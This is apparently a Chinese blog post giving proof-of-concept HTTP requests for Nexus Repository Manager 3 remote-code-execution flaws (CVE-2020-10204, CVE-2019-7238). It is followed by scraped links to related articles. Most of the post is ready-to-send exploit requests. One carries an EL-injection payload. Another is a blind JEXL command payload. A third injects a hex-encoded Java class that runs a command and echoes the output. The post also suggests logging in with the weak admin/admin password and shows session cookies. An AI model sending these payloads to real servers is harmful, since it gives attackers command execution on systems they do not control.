Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过。

CVE-2020-10199:Nexus Repository Manager OSS/PRo <=3.21.1,需有低权限账号。
CVE-2020-10204:Nexus Repository Manager OSS/PRo <=3.21.1,需有管理员账号。

CVE-2020-10204

弱口令admin/admin登录

poc

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: xxx:46660
Content-Length: 292
accept: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) >AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.3170138167765151
Content-Type: application/json
Origin: http://192.168.83.40:46660
Referer: http://192.168.83.40:46660/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTg4MDUwODM0LCJlbWFpbCI6ImFkbWluQGJhaW1hb2h1aS5uZXQifQ.oxM4vBBagsMl1R1Nf-YNdeKI4fKUiCQY4PPZ9UR6OrE; NX-ANTI-CSRF-TOKEN=0.3170138167765151; _ga=GA1.4.1188408586.1587980353; _gid=GA1.4.198747155.1587980353; NXSESSIONID=c2ba012e-c120-4a7d-882c-dbdddf31779b
Connection: close{
"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]}
}

CVE-2020-11444 越权

未授权RCE CVE-2019-7238
影响范围
Nexus Repository Manager OSS/Pro 3.6.2版本到3.14.0版本
触发必要条件
需要maven仓库内必须要至少一个包,如果没有需要登陆后自行上传一个任意包

无回显payload

POST /service/extdirect HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 397
Connection: close{"type": "rpc", "method": "previewAssets", "tid": 18, "data": [{"limit": 50, "sort": [{"property": "name", "direction": "ASC"}], "page": 1, "filter": [{"value": "*", "property": "repositoryName"}, {"value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"firefox\")", "property": "expression"}, {"value": "jexl", "property": "type"}], "start": 0}], "action": "coreui_Component"}

回显payload

POST /service/extdirect HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 7249
Connection: close{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='CAFEBABE0000003100AE0A001F00560A005700580A005700590A005A005B0A005A005C0A005D005E0A005D005F0700600A000800610A006200630700640800650A001D00660800410A001D00670A006800690A0068006A08006B08004508006C08006D0A006E006F0A006E00700A001F00710A001D00720800730A000800740800750700760A001D00770700780A0079007A08007B08007C07007D0A0023007E0A0023007F0700800100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100114C4578706C6F69742F546573743233343B01000474657374010015284C6A6176612F6C616E672F537472696E673B29560100036F626A0100124C6A6176612F6C616E672F4F626A6563743B0100016901000149010003636D640100124C6A6176612F6C616E672F537472696E673B01000770726F636573730100134C6A6176612F6C616E672F50726F636573733B01000269730100154C6A6176612F696F2F496E70757453747265616D3B010006726573756C740100025B42010009726573756C745374720100067468726561640100124C6A6176612F6C616E672F5468726561643B0100056669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000C7468726561644C6F63616C7301000E7468726561644C6F63616C4D61700100114C6A6176612F6C616E672F436C6173733B01000A7461626C654669656C640100057461626C65010005656E74727901000A76616C75654669656C6401000E68747470436F6E6E656374696F6E01000E48747470436F6E6E656374696F6E0100076368616E6E656C01000B487474704368616E6E656C010008726573706F6E7365010008526573706F6E73650100067772697465720100154C6A6176612F696F2F5072696E745772697465723B0100164C6F63616C5661726961626C65547970655461626C650100144C6A6176612F6C616E672F436C6173733C2A3E3B01000A457863657074696F6E7307008101000A536F7572636546696C6501000C546573743233342E6A6176610C002700280700820C008300840C008500860700870C008800890C008A008B07008C0C008D00890C008E008F0100106A6176612F6C616E672F537472696E670C002700900700910C009200930100116A6176612F6C616E672F496E74656765720100106A6176612E6C616E672E5468726561640C009400950C009600970700980C0099009A0C009B009C0100246A6176612E6C616E672E5468726561644C6F63616C245468726561644C6F63616C4D617001002A6A6176612E6C616E672E5468726561644C6F63616C245468726561644C6F63616C4D617024456E74727901000576616C756507009D0C009E009F0C009B00A00C00A100A20C00A300A40100276F72672E65636C697073652E6A657474792E7365727665722E48747470436F6E6E656374696F6E0C00A500A601000E676574487474704368616E6E656C01000F6A6176612F6C616E672F436C6173730C00A700A80100106A6176612F6C616E672F4F626A6563740700A90C00AA00AB01000B676574526573706F6E73650100096765745772697465720100136A6176612F696F2F5072696E745772697465720C00AC002F0C00AD002801000F4578706C6F69742F546573743233340100136A6176612F6C616E672F457863657074696F6E0100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000777616974466F7201000328294901000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0100136A6176612F696F2F496E70757453747265616D010009617661696C61626C6501000472656164010007285B4249492949010005285B4229560100106A6176612F6C616E672F54687265616401000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C6401000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100176A6176612F6C616E672F7265666C6563742F41727261790100096765744C656E677468010015284C6A6176612F6C616E672F4F626A6563743B2949010027284C6A6176612F6C616E672F4F626A6563743B49294C6A6176612F6C616E672F4F626A6563743B010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B010006657175616C73010015284C6A6176612F6C616E672F4F626A6563743B295A0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100186A6176612F6C616E672F7265666C6563742F4D6574686F64010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100057772697465010005636C6F736500210026001F000000000002000100270028000100290000002F00010001000000052AB70001B100000002002A00000006000100000009002B0000000C000100000005002C002D00000009002E002F0002002900000304000400140000013EB800022AB600034C2BB60004572BB600054D2CB60006BC084E2C2D032CB60006B6000757BB0008592DB700093A04B8000A3A05120B57120CB8000D120EB6000F3A06190604B6001019061905B600113A07120B571212B8000D3A0819081213B6000F3A09190904B6001019091907B600113A0A120B571214B8000D3A0B190B1215B6000F3A0C190C04B60010013A0D03360E150E190AB80016A2003E190A150EB800173A0F190FC70006A70027190C190FB600113A0D190DC70006A70016190DB60018B60019121AB6001B990006A70009840E01A7FFBE190DB600183A0E190E121C03BD001DB6001E190D03BD001FB600203A0F190FB600183A101910122103BD001DB6001E190F03BD001FB600203A111911B600183A121912122203BD001DB6001E191103BD001FB60020C000233A1319131904B600241913B60025B100000003002A0000009600250000001600080017000D0018001200190019001A0024001B002E001D0033001F004200200048002100510023005B002500640026006A002700730029007D002A0086002B008C002D008F002F009C003100A5003200AA003300AD003500B6003600BB003700BE003900CE003A00D1002F00D7003D00DE003E00F4003F00FB004001110041011800420131004401380045013D0049002B000000DE001600A5002C00300031000F0092004500320033000E0000013E003400350000000801360036003700010012012C00380039000200190125003A003B0003002E0110003C003500040033010B003D003E0005004200FC003F00400006005100ED004100310007005B00E3004200430008006400DA004400400009007300CB00450031000A007D00C100460043000B008600B800470040000C008F00AF00480031000D00DE006000490043000E00F4004A004A0031000F00FB0043004B004300100111002D004C0031001101180026004D004300120131000D004E004F00130050000000340005005B00E3004200510008007D00C100460051000B00DE006000490051000E00FB0043004B0051001001180026004D005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n    y,\n   'Exploit.Test234',\n    z.getBytes('latin1'),    0,\n    3054\n);x.getMethod('test', ''.class).invoke(null, 'ifconfig');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10204),CVE-2020-11444 越权漏洞相关推荐

  1. Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238

    目录 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 Vulnhub官方复现教程 https://vulhub.org/#/environments/nexus/CVE- ...

  2. war包启动命令_【漏洞预警】Oracle WebLogic远程命令执行0day漏洞(CVE20192725补丁绕过)...

    概述 近日,奇安信天眼与安服团队通过数据监控发现,野外出现Oracle WebLogic远程命令执行漏洞最新利用代码,此攻击利用绕过了厂商今年4月底所发布的最新安全补丁(CVE-2019-2725). ...

  3. TerraMaster TOS 远程命令执行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)

    一.漏洞名称 TerraMaster TOS 远程命令执行(CVE-2022-24989) TerraMaster TOS 敏感信息泄露(CVE-2022-24990) 二.影响版本 TerraMas ...

  4. getshell之Nexus远程命令执行(CVE-2020-10199)

    @MoCo菜弟弟 Nexus远程命令执行CVE-2020-10199 0x01漏洞描述 ​ 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Reposito ...

  5. 代码审计-dubbo admin =2.6.1远程命令执行漏洞

    前置 输入材料 安全目标和需求 架构分析 供应链安全 源代码审查 依赖结构矩阵(Dependency Structure Matrices,DSM) 数据流 信任边界 数据存贮 威胁列表 otter ...

  6. exim远程命令执行漏洞分析(cve-2019-10149)

    0x00 前言 在对Exim邮件服务器最新改动进行代码审计过程中,我们发现4.87到4.91版本之间的Exim存在一个远程命令执行(RCE)漏洞.这里RCE指的是远程命令执行(Remote Comma ...

  7. webmin远程命令执行漏洞(cve-2019-15107)深入分析

    漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...

  8. 【注意】关于Redis存在远程命令执行漏洞的安全公告

    点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...

  9. 【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)

    0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run t ...

最新文章

  1. mac 配置 php,mac如何配置php环境
  2. 多些时间能少写些代码(转自酷壳 – CoolShell.cn)
  3. 聊聊找工作中的项目经验问题(推荐系统和智能问答)
  4. MySQL数据库修改字段的长度
  5. 小菜学习设计模式(五)—控制反转(Ioc)
  6. [音乐欣赏]Craigie Hill
  7. 利用SIMULINK搭建一个16QAM调制解调收发系统
  8. 如何满足二级数据服务之需
  9. 伪mac android,Mac,android sdk,monkey压力测试,真机
  10. 提升购物体验,跨境电商如何做企业管理?
  11. Python 错误和异常小结[转]
  12. 【万里征程——Windows App开发】应用栏
  13. 转载 二叉树的创建、遍历、深度、叶子节点数
  14. linux环境 前端开发环境搭建,Linux运维知识之linux 前端环境搭建
  15. 第八章节 文件操作一 (文件常用操作)
  16. 统计学习方法读书笔记3-感知机SVM
  17. 信息图表是如何炼成的之一:媒体使用情况
  18. [Publish AAR To Maven] 注册 Maven 仓库 sonatype.org 账户
  19. 想知道ios系统还有哪些比较好用的思维导图软件?
  20. 芝诺数解|「十一」千里姻缘一“线”牵—重庆网络婚恋分析报告

热门文章

  1. 至简设计系列_电子密码锁
  2. 菜鸟下一代分布式体系架构的设计理念
  3. 8. 面向对象 -- 继承
  4. 【WinHex篇】WinHex制作磁盘镜像教程
  5. 树莓派 可用于播放音频的三个软件
  6. JadePool应用范例:实现中国行政区划管理
  7. 开车的人和不开车的人思维有什么区别?
  8. ...startWebLogic.sh: line 202:21293 已杀死
  9. ata驱动框架及scsi请求处理流程
  10. 计算机操作 操作鉴定试题及答案,计算机操作员初级试题及答案